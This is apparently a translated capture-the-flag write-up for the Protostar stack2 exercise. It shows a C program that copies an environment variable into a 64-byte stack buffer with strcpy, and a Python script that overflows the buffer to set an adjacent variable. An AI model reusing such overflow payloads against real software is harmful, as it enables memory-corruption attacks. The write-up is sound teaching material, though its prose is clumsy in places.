Introduction
This exercise sets the buffer value through environment variables, so we need to set an environment variable larger than 64 bytes in the exploit.
source code
1 #include <stdlib.h> 2 #include <unistd.h> 3 #include <stdio.h> 4 #include <string.h> 5 6 int main(int argc, char **argv) 7 { 8 volatile int modified; 9 char buffer[64]; 10 char *variable; 11 12 variable = getenv("GREENIE"); 13 14 if(variable == NULL) { 15 errx(1, "please set the GREENIE environment variable\n"); 16 } 17 18 modified = 0; 19 20 strcpy(buffer, variable); 21 22 if(modified == 0x0d0a0d0a) { 23 printf("you have correctly modified the variable\n"); 24 } else { 25 printf("Try again, you got 0x%08x\n", modified); 26 } 27 28 }
analyze
As can be seen from the code, the program first obtains the value of the environment variable GREENIE through getenv and assigns it to the variable variable, and then passes the value of the variable to the buffer through the strcpy function. The length detection is also not performed, and a stack overflow may occur. Finally, determine the modified Whether the value is 0x0d0a0d0a.
In fact, there is no change in the payload and stack1 for this exercise, as long as the last modification is 0x0a0d0a0d.
The main question is how to set environment variables to non-printing characters in python.
Written by EXPLOIT
The environment variable can be set using environ in the os module, but it cannot be set directly to 0x0a0d0a0d. The value set by the environment variable is required to be a string, but 0x0a and 0x0d are not print characters. So use the decode function to convert hexadecimal to characters. code show as below:
1 import os 2 payload = "616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161616161610a0d0a0d" 3 os.environ["GREENIE"] = payload.decode("hex") 4 cmd = "/opt/protostar/bin/stack2" 5 os.system(cmd)
Results of the:
$ python exploit2.py
you have correctly modified the variable